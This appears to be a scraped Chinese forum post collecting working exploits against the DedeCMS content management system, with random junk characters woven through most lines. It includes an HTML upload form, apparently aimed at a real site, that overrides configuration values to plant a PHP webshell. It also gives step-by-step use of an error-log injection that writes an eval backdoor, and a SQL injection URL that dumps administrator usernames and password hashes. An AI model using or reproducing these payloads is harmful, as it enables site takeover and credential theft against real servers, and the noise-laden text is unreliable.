</head>9 W' y [+ R$ a) q
<body style="FONT-SIZE: 9pt">* w3 l: O3 i/ R4 c9 K9 M
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />" e7 \: u: o" F4 P$ _8 j# G4 w; e
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
5 y5 S) Y6 `( ]* v<input type='hidden' name='activepath' value='/data/cache/' /># R0 P2 H A$ K B. X
<input type='hidden' name='cfg_basedir' value='../../' />/ C/ Q5 V, z) z O! x3 m- j
<input type='hidden' name='cfg_imgtype' value='php' /> {# [4 N* x6 I% A
<input type='hidden' name='cfg_not_allowall' value='txt' />
4 l* \# V8 s: G3 s/ @$ o<input type='hidden' name='cfg_softtype' value='php' />/ H' p( q: X6 g6 v; N* j! O
<input type='hidden' name='cfg_mediatype' value='php' />
c; D& o* ] ~1 }/ f<input type='hidden' name='f' value='form1.enclosure' />
) ~ l+ d/ f a- W: q6 u6 h0 p<input type='hidden' name='job' value='upload' />
- V- l# Y; R8 F# @) g<input type='hidden' name='newname' value='fly.php' />
( t( Y" T/ f& X) _% r1 cSelect U Shell <input type='file' name='uploadfile' size='25' />6 _. J/ o- }# V0 J
<input type='submit' name='sb1' value='确定' />
( ~! J+ p( y$ l0 f</form>8 n2 m) T; a" b8 d) J# P* {
<br />It's just a exp for the bug of Dedecms V55...<br />
9 o% b9 @0 V3 k; G9 y2 M* QNeed register_globals = on...<br />
/ F* X" P% c# i) b+ OFun the game,get a webshell at /data/cache/fly.php...<br />3 Z# u1 F+ }8 J- k1 n; n& {! N
</body>
u8 C6 c% `& ]5 S) p8 k/ ?</html>1 X8 O% t _1 {" Y3 f( k/ r! i" O
3 J4 y' F$ V( {
( ]1 _% Y5 @6 L: J
0 p* }& T9 F0 a3 r* ~0 q2 l
% Q) H- [5 ?' }/ Q* N) x* p# |: Y5 ^# {
, h% n' y, ~4 i3 x5 U
8 g/ C" H5 X; r% c% v) `$ _6 ]' g- b; Q% y
1 Z- d: w R2 _* c& x5 x( f0 x) Q# Q7 d' O
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
4 k: F, Z, ^+ v+ V& Z利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
, L. H; P( i- C" ?+ Y1. 访问网址:
( ?6 H- D: U& n) O8 ^http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
$ D: O6 @/ u, D! \+ V# S! z可看见错误信息
& c1 X% @# g! u# S# L3 I+ C
% Y# p0 |' N1 i- P1 l/ u x3 F
. M, q) O6 m& O2 u0 x$ b: d2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。' I% d, }6 Q2 D9 f/ X1 g8 p( [6 Q: |
int(3) Error: Illegal double '1024e1024' value found during parsing
9 N6 T2 D5 A7 U3 |4 {! Z3 u4 t6 n; RError sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
6 G' Q) M% e6 n
6 B/ n! s% R! r, w1 V. r- n3 ]! B7 f, B) O8 S8 u. `
3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是. J- c. I3 C% s, O
3 {* V4 ?; ^) W, a6 \
/ b6 O! l) z- w% K% w9 H<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>; \/ P4 _( n7 L; P
# O2 z1 W, e: f* ~* \5 O* ?
2 v- }( u/ ~2 y8 k: r! j按确定后的看到第2步骤的信息表示文件木马上传成功.+ {0 T( n d5 J6 B5 ?# B- U0 S- w# F$ d
* E% p7 s Q3 G1 D3 K6 s
& q' g4 s9 h$ D* I
0 n. G! t2 M2 u6 y F5 K
! ^1 y9 ]0 f. i6 ~( V' C* G
* w3 O7 V+ j1 s4 q, m
- D! ]8 o( [$ G* @
. |: s. N+ `5 l, u; H5 S
" `" A( L; E2 K3 J9 W1 L7 f
% K/ a) r- @3 Z6 d2 G3 ~. W7 J
6 x! |3 l, y3 o2 B/ A+ ?7 G& `* x* s+ O
6 M) m3 v3 I! Y/ |% t; i- B' n织梦(DedeCms)plus/infosearch.php 文件注入漏洞
# g9 p& D9 F ohttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对